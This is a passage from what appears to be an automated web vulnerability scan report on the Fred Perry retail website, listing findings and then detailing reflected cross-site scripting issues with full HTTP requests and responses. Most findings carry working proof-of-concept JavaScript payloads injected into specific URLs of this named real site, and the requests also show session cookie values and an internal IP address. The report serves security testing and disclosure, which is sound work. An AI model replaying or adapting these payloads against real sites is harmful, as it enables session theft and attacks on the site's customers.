7.12. https://www.fredperry.com/skin/frontend/default/default/css/print.css

7.13. https://www.fredperry.com/skin/frontend/default/default/css/styles.css

8. Private IP addresses disclosed

8.1. http://www.fredperry.com/js/index.php

8.2. http://www.fredperry.com/skin/frontend/default/default/css/catalogue.css

8.3. http://www.fredperry.com/skin/frontend/default/default/css/clears.css

8.4. http://www.fredperry.com/skin/frontend/default/default/css/fp_style.css

8.5. http://www.fredperry.com/skin/frontend/default/default/css/generalpages.css

8.6. http://www.fredperry.com/skin/frontend/default/default/css/generalpages.css

8.7. http://www.fredperry.com/skin/frontend/default/default/css/gs_960.css

8.8. http://www.fredperry.com/skin/frontend/default/default/css/gs_960.css

8.9. http://www.fredperry.com/skin/frontend/default/default/css/gs_reset.css

8.10. http://www.fredperry.com/skin/frontend/default/default/css/gs_text.css

8.11. http://www.fredperry.com/skin/frontend/default/default/css/gs_text.css

8.12. http://www.fredperry.com/skin/frontend/default/default/css/payment.css

8.13. http://www.fredperry.com/skin/frontend/default/default/css/print.css

8.14. http://www.fredperry.com/skin/frontend/default/default/css/styles.css

8.15. http://www.fredperry.com/skin/frontend/default/default/css/styles.css

9. Social security numbers disclosed

9.1. http://www.fredperry.com/aboutus/careers/

9.2. http://www.fredperry.com/aboutus/security/

9.3. http://www.fredperry.com/aboutus/terms/

9.4. http://www.fredperry.com/accessories/

9.5. http://www.fredperry.com/accessories/men/

9.6. http://www.fredperry.com/accessories/women/

9.7. http://www.fredperry.com/arcade/

9.8. http://www.fredperry.com/bags/

9.9. http://www.fredperry.com/bags/men/

9.10. http://www.fredperry.com/bags/women/

9.11. http://www.fredperry.com/checkout/cart/

9.12. http://www.fredperry.com/contacts/

9.13. http://www.fredperry.com/customercare/

9.14. http://www.fredperry.com/customercare/delivery/

9.15. http://www.fredperry.com/customercare/deliverylate/

9.16. http://www.fredperry.com/customercare/faq/

9.17. http://www.fredperry.com/customercare/information/

9.18. http://www.fredperry.com/customercare/ordertracking/

9.19. http://www.fredperry.com/customercare/returns/

9.20. http://www.fredperry.com/footwear/

9.21. http://www.fredperry.com/footwear/men/

9.22. http://www.fredperry.com/footwear/women/

9.23. http://www.fredperry.com/heritage/

9.24. http://www.fredperry.com/home/

9.25. http://www.fredperry.com/js/index.php

9.26. http://www.fredperry.com/kids/kidswear/

9.27. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/

9.28. http://www.fredperry.com/limited-edition/

9.29. http://www.fredperry.com/limited-edition/men/

9.30. http://www.fredperry.com/limited-edition/men/accessories/

9.31. http://www.fredperry.com/limited-edition/men/bags/

9.32. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/

9.33. http://www.fredperry.com/limited-edition/men/british-collectables/

9.34. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/

9.35. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/

9.36. http://www.fredperry.com/limited-edition/men/footwear/

9.37. http://www.fredperry.com/limited-edition/men/jackets/

9.38. http://www.fredperry.com/limited-edition/men/knitwear/

9.39. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/

9.40. http://www.fredperry.com/limited-edition/men/new-styles/

9.41. http://www.fredperry.com/limited-edition/men/shirts/

9.42. http://www.fredperry.com/limited-edition/men/shorts/

9.43. http://www.fredperry.com/limited-edition/men/trousers/

9.44. http://www.fredperry.com/limited-edition/men/woven-shirts/

9.45. http://www.fredperry.com/limited-edition/women/

9.46. http://www.fredperry.com/limited-edition/women/accessories/

9.47. http://www.fredperry.com/limited-edition/women/bags/

9.48. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/

9.49. http://www.fredperry.com/limited-edition/women/collaboration/

9.50. http://www.fredperry.com/limited-edition/women/dresses/

9.51. http://www.fredperry.com/limited-edition/women/footwear/

9.52. http://www.fredperry.com/limited-edition/women/jackets/

9.53. http://www.fredperry.com/limited-edition/women/jessica-ogden/

9.54. http://www.fredperry.com/limited-edition/women/knitwear/

9.55. http://www.fredperry.com/limited-edition/women/new-styles/

9.56. http://www.fredperry.com/limited-edition/women/shirts/

9.57. http://www.fredperry.com/limited-edition/women/shorts/

9.58. http://www.fredperry.com/limited-edition/women/skirts/

9.59. http://www.fredperry.com/limited-edition/women/trousers/

9.60. http://www.fredperry.com/limited-edition/women/woven-shirts/

9.61. http://www.fredperry.com/men/

9.62. http://www.fredperry.com/men/jackets/

9.63. http://www.fredperry.com/men/knitwear/

9.64. http://www.fredperry.com/men/shirts/

9.65. http://www.fredperry.com/men/t-shirts/

9.66. http://www.fredperry.com/men/tennis/

9.67. http://www.fredperry.com/men/track-jackets/

9.68. http://www.fredperry.com/men/trousers/

9.69. http://www.fredperry.com/men/woven-shirts/

9.70. http://www.fredperry.com/productinfo/clothingsizes/

9.71. http://www.fredperry.com/productinfo/footwearsizes/

9.72. http://www.fredperry.com/productinfo/garmentcare/

9.73. http://www.fredperry.com/sale/

9.74. http://www.fredperry.com/shops/

9.75. http://www.fredperry.com/site-map/

9.76. http://www.fredperry.com/women/

9.77. http://www.fredperry.com/women/amy-winehouse-landing/

9.78. http://www.fredperry.com/women/amy-winehouse/

9.79. http://www.fredperry.com/women/dresses/

9.80. http://www.fredperry.com/women/jackets/

9.81. http://www.fredperry.com/women/knitwear/

9.82. http://www.fredperry.com/women/shirts/

9.83. http://www.fredperry.com/women/skirts/

9.84. http://www.fredperry.com/women/t-shirts/

9.85. http://www.fredperry.com/women/tennis/

9.86. http://www.fredperry.com/women/trousers/

9.87. http://www.fredperry.com/women/woven-shirts/

9.88. https://www.fredperry.com/customer/account/login/

9.89. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/

9.90. https://www.fredperry.com/js/index.php

10. Cacheable HTTPS response

11. HTML does not specify charset

12. Content type incorrectly stated

12.1. http://www.fredperry.com/catalogsearch/ajax/suggest/

12.2. http://www.fredperry.com/js/index.php

12.3. http://www.fredperry.com/skin/frontend/default/default/favicon.ico

12.4. https://www.fredperry.com/skin/frontend/default/default/favicon.ico

13. SSL certificate



1. Cross-site scripting (reflected)
There are 291 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.fredperry.com/aboutus/careers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/careers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a260"-alert(1)-"b04c9bfebf1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus1a260"-alert(1)-"b04c9bfebf1/careers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=6lgtsf14sq6tgh58hvj7o36lt3; expires=Tue, 09-Nov-2010 17:20:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus1a260"-alert(1)-"b04c9bfebf1/careers/");
//]]>
...[SNIP]...

1.2. http://www.fredperry.com/aboutus/careers/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/careers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2112"-alert(1)-"7af98893783 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/careerse2112"-alert(1)-"7af98893783/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=6cb751jfeultlo2nf47np4ppg5; expires=Tue, 09-Nov-2010 17:20:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/careerse2112"-alert(1)-"7af98893783/");
//]]>
...[SNIP]...

1.3. http://www.fredperry.com/aboutus/careers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/careers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ced5c"-alert(1)-"791ad1593cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/careers/?ced5c"-alert(1)-"791ad1593cd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=iqubl3ro9c6o2rpcraltep9280; expires=Tue, 09-Nov-2010 17:19:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Careers
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/careers/?ced5c"-alert(1)-"791ad1593cd=1");
//]]>
...[SNIP]...

1.4. http://www.fredperry.com/aboutus/security/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/security/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c3b6"-alert(1)-"920d2168f26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus6c3b6"-alert(1)-"920d2168f26/security/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=grqcphacqsbo1480b6jtpofki7; expires=Tue, 09-Nov-2010 17:19:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus6c3b6"-alert(1)-"920d2168f26/security/");
//]]>
...[SNIP]...

1.5. http://www.fredperry.com/aboutus/security/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/security/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4522d"-alert(1)-"c1b9f21713f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/security4522d"-alert(1)-"c1b9f21713f/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=02tsp3nrifb4436vg02ro7s4l0; expires=Tue, 09-Nov-2010 17:20:07 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/security4522d"-alert(1)-"c1b9f21713f/");
//]]>
...[SNIP]...

1.6. http://www.fredperry.com/aboutus/security/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/security/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37e49"-alert(1)-"987bc5a30f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/security/?37e49"-alert(1)-"987bc5a30f4=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3dnjr2him06dao06n4pjatqll0; expires=Tue, 09-Nov-2010 17:19:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Securit
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/security/?37e49"-alert(1)-"987bc5a30f4=1");
//]]>
...[SNIP]...

1.7. http://www.fredperry.com/aboutus/terms/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/terms/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bae7"-alert(1)-"fc574894142 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus6bae7"-alert(1)-"fc574894142/terms/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9r493rjv2rujrhmdkb6it0kgu1; expires=Tue, 09-Nov-2010 17:20:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus6bae7"-alert(1)-"fc574894142/terms/");
//]]>
...[SNIP]...

1.8. http://www.fredperry.com/aboutus/terms/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/terms/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7c69"-alert(1)-"63f5ec0be34 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/termsa7c69"-alert(1)-"63f5ec0be34/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=v21cj99monqcosil98b2hq65s5; expires=Tue, 09-Nov-2010 17:20:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/termsa7c69"-alert(1)-"63f5ec0be34/");
//]]>
...[SNIP]...

1.9. http://www.fredperry.com/aboutus/terms/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/terms/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4969"-alert(1)-"37e10aae9f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/terms/?e4969"-alert(1)-"37e10aae9f7=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=i5c8ei9du2c74tcqn89ncrql67; expires=Tue, 09-Nov-2010 17:19:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Terms &
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/terms/?e4969"-alert(1)-"37e10aae9f7=1");
//]]>
...[SNIP]...

1.10. http://www.fredperry.com/accessories/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3885"-alert(1)-"9526fa7e2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessoriesb3885"-alert(1)-"9526fa7e2c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=k2rp2ik1110pdvlrndo6p1vf63; expires=Tue, 09-Nov-2010 17:05:22 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessoriesb3885"-alert(1)-"9526fa7e2c/");
//]]>
...[SNIP]...

1.11. http://www.fredperry.com/accessories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/

Issue detail

